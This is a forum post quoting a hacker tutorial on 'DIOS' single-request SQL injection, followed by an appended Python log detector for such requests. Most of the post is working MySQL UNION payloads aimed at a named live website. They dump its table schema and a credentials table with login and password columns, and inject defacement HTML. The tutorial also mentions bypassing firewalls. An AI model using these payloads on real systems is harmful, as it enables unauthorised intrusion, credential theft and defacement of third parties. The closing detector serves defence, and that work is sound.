[quote]versailles wrote:
DIOS (Dump In One Shot)
Meaning :: we can dump / pull out the contents of a database with a single request..
Brief history ::
DIOS was first introduced by Profexer (rdot.org), then developed further by M@dbl00d (Mas fuad-Sec7or team), Zen Javanicus (securityidiots.com), MakMan, and other injector friends..
let's go :D
/*! IMPORTANT: save this somewhere safe */
-------- DIOS cheatsheet ---------
Query to dump all tables and columns..
======================================
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
=======================================
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
=======================================
(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.coLumns )where(@:=concat(@,0x3c6c693e,table_name,0x203a3a20,column_name))),@)))
======================================
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0x203a3a20,2)),@,2))
---------------------------------------
pick one of the DIOS queries..
target :: http://www.icpconcepts.com/produit.php?id=55
I assume you already know how to find the magic number...
just replace column 21 / the magic number with the DIOS query :p
let's try dumping all tables and columns ::
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),22,23,24,25,26,27,28,29,30--+
-- Result ---
User :: id
User :: code
User :: id_parrain
User :: origine
User :: specialite
User :: nom
User :: prenom
User :: adresse
User :: cp
User :: ville
User :: pays
User :: mail
User :: telephone
User :: login
User :: mdp
User :: type
User :: is_active
User :: l_nom
User :: l_prenom
User :: l_adresse
User :: l_cp
User :: l_ville
User :: l_pays
User :: l_telephone
User :: perle
User :: is_parrain_credite
User :: message
User :: id_commercial
User :: source
User :: source_name
User :: zone_pays
User :: siret
connexion :: id
connexion :: login
connexion :: passwd
connexion :: email
connexion :: nom_connexion
bla bla bla bla .....
now that we know the table name and column names, to dump / extract the data do this ::
let's try dumping from table "connexion", columns "id", "login", and "passwd" ..
/*! pay close attention to the part of the query that changes. */
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,(select(@x)from(select(@x:=0x00),(select(0)from(connexion)where(@x:=concat+(@x,0x3c62723e,id,0x203a3a20,login,0x203a3a20,passwd))))x),22,23,24,25,26,27,28,29,30--+
--Result--
#NB
you can modify the query :D
add html tags / SQL commands inside concat()
example ::
http://www.icpconcepts.com/produit.php?id=-55+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(0x3c666f6e7420636f6c6f723d626c75653e3c623e496e6a6563746564204279205665727361696c6c65733c2f623e3c2f666f6e743e,0x3c62723e4461746162617365203a3a20,database(),0x3c62723e4d7953514c2056657273696f6e203a3a20,version(),0x3c62723e43757272656e742055736572203a3a20,user(),0x3c62723e2053796d6c696e6b203a3a20,@@Global.have_symlink,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),22,23,24,25,26,27,28,29,30--+
Explanation ::
we can insert html tags while injecting the web app..
such as <font>
etc., on the condition that they are converted to hex and prefixed with 0x.
Hex form ::
0x3c666f6e7420636f6c6f723d626c75653e3c623e496e6a6563746564204279205665727361696c6c65733c2f623e3c2f666f6e743e is <font color=blue>Injected By Versailles</font>
DIOS also works on sites behind a firewall .. just use the usual WAF bypass for the characters / strings that get blocked..
With this technique you don't need to convert the table names, and at the same time we get to see all tables and columns in one go :)
Thanks to ::
rdot.org, Hackforum.net, securityidiots.com, and all the other injector forums..
That's all for now :3
Versailles
Sec7orTeam[/quote]
Awesome
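From the defender's side, the DIOS queries quoted above share a recognisable shape in the access log: a UNION SELECT, a subquery over information_schema, a user-variable accumulator (@x:=concat / make_set / export_set), and hex-encoded HTML separators such as 0x3c62723e. The following detector is an added example, not code from the post or from Sec7orTeam; it assumes Apache/nginx combined log format and runs over constructed sample lines (the addresses and second-line payloads are made up, only their shape mirrors the cheatsheet).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Lines 2 and 3 carry
# payloads shaped like the DIOS cheatsheet queries; lines 1 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /produit.php?id=55 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:12:00:07 +0000] "GET /produit.php?id=-55+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4--+ HTTP/1.1" 200 9021
203.0.113.9 - - [10/Oct/2023:12:01:00 +0000] "GET /produit.php?id=-55+union+select+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),3--+ HTTP/1.1" 200 7700
198.51.100.2 - - [10/Oct/2023:12:02:00 +0000] "GET /search.php?q=make%20set HTTP/1.1" 200 300
"""

# Combined log format: client ip, ident, user, [timestamp], "METHOD path PROTO", status, size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

# Each indicator is matched against the URL-decoded, lower-cased request path.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b\s*(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"information_schema\.(?:columns|tables)"),
    # @x:=concat(...), @:=make_set(...), @:=export_set(...): the row accumulator
    "user_var_accumulator": re.compile(r"@\w*\s*:=\s*(?:concat|make_set|export_set)\s*\("),
    # hex for "<br>" and "<li>", the separators the cheatsheet inserts between rows
    "hex_html_separator": re.compile(r"0x3c(?:62723e|6c693e)"),
}

def score_request(raw_path):
    """Return the names of the DIOS indicators matched by one request path."""
    decoded = unquote_plus(raw_path).lower()  # '+' and %xx become plain text first
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]

def find_dios_requests(log_text, min_hits=2):
    """Return (ip, path, indicators) for every line matching at least min_hits indicators.

    Requiring two or more indicators keeps a lone 'union' or 'make set' in a
    search term from raising an alert.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        found = score_request(m["path"])
        if len(found) >= min_hits:
            hits.append((m["ip"], m["path"], found))
    return hits
```

Point the same function at a real log file (read as text) to list which client addresses sent DIOS-shaped requests and which indicators fired; a 200 response with a much larger body than the parameter normally returns, as on the constructed second line, is the extra signal that the query succeeded.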